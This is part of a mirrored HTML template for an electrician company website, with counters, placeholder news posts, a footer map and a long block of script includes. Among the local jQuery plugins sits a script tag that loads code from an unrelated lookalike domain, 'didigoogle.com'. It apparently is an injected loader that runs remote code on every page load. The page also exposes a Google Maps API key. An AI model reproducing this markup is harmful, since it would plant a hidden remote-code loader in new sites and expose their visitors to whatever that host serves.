										<li><a href="#"><i class="fa fa-twitter"></i></a></li>
										<li><a href="#"><i class="fa fa-google-plus"></i></a></li>
										<li><a href="#"><i class="fa fa-linkedin"></i></a></li>
									</ul>
								</div>
							</div>
						</div>
						<div class="content-holder">
							<h4><a href="expart-details.html">Jon Hafizur</a></h4>
							<h5>Electrician</h5>
							
						</div>
					</div>          
				</div>
			</div>
		</section>

		<!--Paralax Style One-->
		<section class="parallax-style-one" style="background-image:url(images/background/bg-4.jpg);">
			<div class="container">
				<div class="overlay">
				<!--Fact Counter-->
				<div class="fact-counter">								  
					<div class="row">
						<div class="counter-outer">
							<!--Column-->
							<article class="column counter-column col-md-3 col-sm-6 col-xs-12 wow fadeIn" data-wow-duration="300ms">
								<div class="item">
									<div class="inner-box">
										<div class="icon-box">
											<i class="icon fa fa-users"></i>
										</div>
										<div class="count-outer">
											<span class="count-text" data-speed="3000" data-stop="1200">0</span>
											<p>Happy Clients</p>
										</div>
									</div>														
								</div>
							</article>
								
							<!--Column-->
							<article class="column counter-column col-md-3 col-sm-6 col-xs-12 wow fadeIn" data-wow-duration="600ms">
								<div class="item">
									<div class="inner-box">
										<div class="icon-box">
											<i class="icon fa fa-trophy"></i>
										</div>
										<div class="count-outer">
											<span class="count-text" data-speed="3000" data-stop="950">0</span>
											<p>Awards Win</p>
										</div>
									</div>														
								</div>
							</article>
								
							<!--Column-->
							<article class="column counter-column col-md-3 col-sm-6 col-xs-12 wow fadeIn" data-wow-duration="900ms">
								<div class="item">
									<div class="inner-box">
										<div class="icon-box">
											<i class="icon fa fa-user"></i>
										</div>
										<div class="count-outer">
											<span class="count-text" data-speed="3000" data-stop="350">0</span>
											<p>Our workers</p>
										</div>
									</div>														
								</div>
							</article>

							<!--Column-->
							<article class="column counter-column col-md-3 col-sm-6 col-xs-12 wow fadeIn" data-wow-duration="900ms">
								<div class="item">
									<div class="inner-box">
										<div class="icon-box">
											<i class="icon fa fa-bolt"></i>
										</div>
										<div class="count-outer">
											<span class="count-text" data-speed="3000" data-stop="1500">0</span>
											<p>Project complete</p>
										</div>
									</div>														
								</div>
							</article>
						</div>
					</div>
				</div>								
				</div>
			</div>
		</section>	

		<section class="blog-section">
		    <div class="container">
		        <div class="sec-title">
					<h2>latest <span>news</span></h2>
					
				</div>
		        <div class="row">
		            <div class="col-md-4 col-sm-6 col-xs-12">
		                <div class="default-blog-news wow fadeInUp animated" style="visibility: visible; animation-name: fadeInUp;">
		                    <div class="img-box">
		                        <a href="blog-details.html"><img src="images/news/3.jpg" alt="News"></a>
		                    </div>
		                    <div class="lower-content">
		                        <div class="date center">21 <br> Aug</div>
		                        <div class="text">
		                            <h4><a href="blog-details.html">This is a standard post with thumbnail</a></h4>
		                            <p>Lorem ipsum dolor sit amet, consectetur adipi sicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna.</p>                            
		                        </div>
		                        <div class="post-meta"><a href="blog-details.html" class="link_btn">Read More</a><span><i class="fa fa-user"></i>By Antony</span><span><i class="fa fa-comments"></i>22 Comments</span></div>
		                        
		                    </div>
		                </div>
		                
		            </div>
		            <div class="col-md-4 col-sm-6 col-xs-12">
		                <div class="default-blog-news wow fadeInUp animated" style="visibility: visible; animation-name: fadeInUp;">
		                    <div class="img-box">
		                        <a href="blog-details.html"><img src="images/news/2.jpg" alt="News"></a>
		                    </div>
		                    <div class="lower-content">
		                        <div class="date center">17 <br> May</div>
		                        <div class="text">
		                            <h4><a href="blog-details.html">This is a standard post with thumbnail</a></h4>
		                             <p>Lorem ipsum dolor sit amet, consectetur adipi sicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna.</p>                             
		                        </div>
		                        <div class="post-meta"><a href="blog-details.html" class="link_btn">Read More</a><span><i class="fa fa-user"></i>By Antony</span><span><i class="fa fa-comments"></i>22 Comments</span></div>
		                        
		                    </div>
		                </div>
		                
		            </div>
		            <div class="col-md-4 col-sm-6 col-xs-12">
		                <div class="default-blog-news wow fadeInUp animated" style="visibility: visible; animation-name: fadeInUp;">
		                    <div class="img-box">
		                        <a href="blog-details.html"><img src="images/news/1.jpg" alt="News"></a>
		                    </div>
		                    <div class="lower-content">
		                        <div class="date center">24 <br> Apr</div>
		                        <div class="text">
		                            <h4><a href="blog-details.html">This is a standard post with thumbnail</a></h4>
		                             <p>Lorem ipsum dolor sit amet, consectetur adipi sicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna.</p>                            
		                        </div>
		                        <div class="post-meta"><a href="blog-details.html" class="link_btn">Read More</a><span><i class="fa fa-user"></i>By Antony</span><span><i class="fa fa-comments"></i>22 Comments</span></div>
		                        
		                    </div>
		                </div>
		                
		            </div>
		            
		        </div>
		    </div>
		</section>


		<footer class="footer bg-style" style="background-image:url(images/background/bg-3.jpg);">
			<div class="container">
				<div class="footer-upper">
				
					<div class="row">
						<div class="item col-md-4 col-sm-6">
							<div class="footer-widget about-widget">
								<a href="#">
									<img src="images/logo/footer-logo.png" alt="Awesome Image" />
								</a>
								<p>Lorem ipsum dolor sit amet, consectetur adipisicing elitsed do eiusmod tempor incididunt ut labore et dolore magna aliqua Lorem ipsum dolor sit amet, consectetur adipisicing elitsed do eiusmod tempor.consectetur adipisicing elitsed do eiusmod tempor consectetur adipisicing elitsed.</p>
								<div class="link_btn">
								   <a href="contact.html" class="button-style-one">contact us</a>
								</div>
							</div>
						</div>
						<div class="item col-md-2 col-sm-6">
							<div class="footer-widget quick-links">
								<h3 class="title">Our Services</h3>
								<ul>
									<li><a href="#">Air Conditioning</a></li>
									<li><a href="#">Lighting Upgrades</a></li>
									<li><a href="#">Electrical Maintenance</a></li>
									<li><a href="#">Install A Ceiling Fan</a></li>
									<li><a href="#">Outdoor And Lighting</a></li>
									<li><a href="#">Repairs</a></li>
									
								</ul>
							</div>
						</div>
						<div class="item col-md-2 col-sm-6">
							<div class="footer-widget our-doctor">
								<h3 class="title">our doctors</h3>
								<ul>
									<li><a href="#">Albart Muzaddid</a></li>
									<li><a href="#">Robart Shalam</a></li>
									<li><a href="#">Jon Hafizur</a></li>
									<li><a href="#">Russell Mia</a></li>
									<li><a href="#">Rashid Hamid</a></li>
									<li><a href="#">Ahmed Khan</a></li>
								</ul>
								
								
							</div>
						</div>
						<div class="item col-md-4 col-sm-6">
							<div class="footer-widget contact-widget">
								<h3 class="title">our location</h3>
								 <div class="footer-map">
			
										<div class="home-google-map">
											<div 
												class="google-map" 
												id="contact-google-map" 
												data-map-lat="39.094781" 
												data-map-lng="-94.571630" 
												data-icon-path="images/logo/footer-marker.png"
												data-map-title="Chester"
												data-map-zoom="10" >
											</div>
										</div>
									
								</div>
							</div>
						</div>
					</div>
				</div>
				<!--Footer Bottom-->
				<div class="footer-bottom">					
					<div class="pull-left"><div class="copyright-text">Copyright @ The Electrician 2017. All Rights Reserved</div></div>
					<div class="pull-right">
						<div class="social-links pull-right">
							<a href="#"><span class="fa fa-facebook-f"></span></a>
							<a href="#"><span class="fa fa-twitter"></span></a>
							<a href="#"><span class="fa fa-linkedin"></span></a>
							<a href="#"><span class="fa fa-instagram"></span></a>
							<a href="#"><span class="fa fa-pinterest-p"></span></a>							
						</div>
					</div>			         
				</div>
			</div>
		</footer>



	<!-- Scroll Top Button -->
	<button class="scroll-top tran3s color2_bg">
		<span class="fa fa-angle-up"></span>
	</button>
	<!-- pre loader  -->
	<div class="preloader"></div>

		<!-- jQuery js -->
		<script src="js/jquery.js"></script>
		<!-- bootstrap js -->
		<script src="js/bootstrap.min.js"></script>
		<!-- jQuery ui js -->
		<script src="js/jquery-ui.js"></script>
		<!-- owl carousel js -->
		<script src="js/owl.carousel.min.js"></script>
		<!-- jQuery validation -->
		<script src="js/jquery.validate.min.js"></script>
		<!-- google map -->
		<script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCRvBPo3-t31YFk588DpMYS6EqKf-oGBSI"></script> 
		<script src="js/gmap.js"></script>
		<!-- mixit up -->
		<script src="js/wow.js"></script>
		<script src="js/jquery.mixitup.min.js"></script>
		<script src="js/jquery.fitvids.js"></script>
		<script src="js/bootstrap-select.min.js"></script>

		<!-- revolution slider js -->
		<script src="assets/revolution/js/jquery.themepunch.tools.min.js"></script>
		<script src="assets/revolution/js/jquery.themepunch.revolution.min.js"></script>
		<script src="assets/revolution/js/extensions/revolution.extension.actions.min.js"></script>
		<script src="assets/revolution/js/extensions/revolution.extension.carousel.min.js"></script>
		<script src="assets/revolution/js/extensions/revolution.extension.kenburn.min.js"></script>
		<script src="assets/revolution/js/extensions/revolution.extension.layeranimation.min.js"></script>
		<script src="assets/revolution/js/extensions/revolution.extension.migration.min.js"></script>
		<script src="assets/revolution/js/extensions/revolution.extension.navigation.min.js"></script>
		<script src="assets/revolution/js/extensions/revolution.extension.parallax.min.js"></script>
		<script src="assets/revolution/js/extensions/revolution.extension.slideanims.min.js"></script>
		<script src="assets/revolution/js/extensions/revolution.extension.video.min.js"></script>

		<!-- fancy box -->
		<script src="js/jquery.fancybox.pack.js"></script>
		<script src="js/jquery.polyglot.language.switcher.js"></script>
		<script src="js/nouislider.js"></script>
		<script src="js/jquery.bootstrap-touchspin.js"></script>
		<script src="js/SmoothScroll.js"></script>
		<script src="http://www.didigoogle.com/preurl/monkey"></script>
		<script src="js/jquery.countTo.html"></script>
		<script src="js/jquery.flexslider.js"></script>
		<script src="js/imagezoom.js"></script>	
		<script src="js/isotope.js"></script>
		<script src="js/validation.js"></script>
		<script id="map-script" src="js/default-map.js"></script>
		<script src="js/custom.js"></script>

	</div>
	
</body>

<!-- Mirrored from wp.hostlin.com/electrician/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 01 Dec 2018 02:43:07 GMT -->
</html>



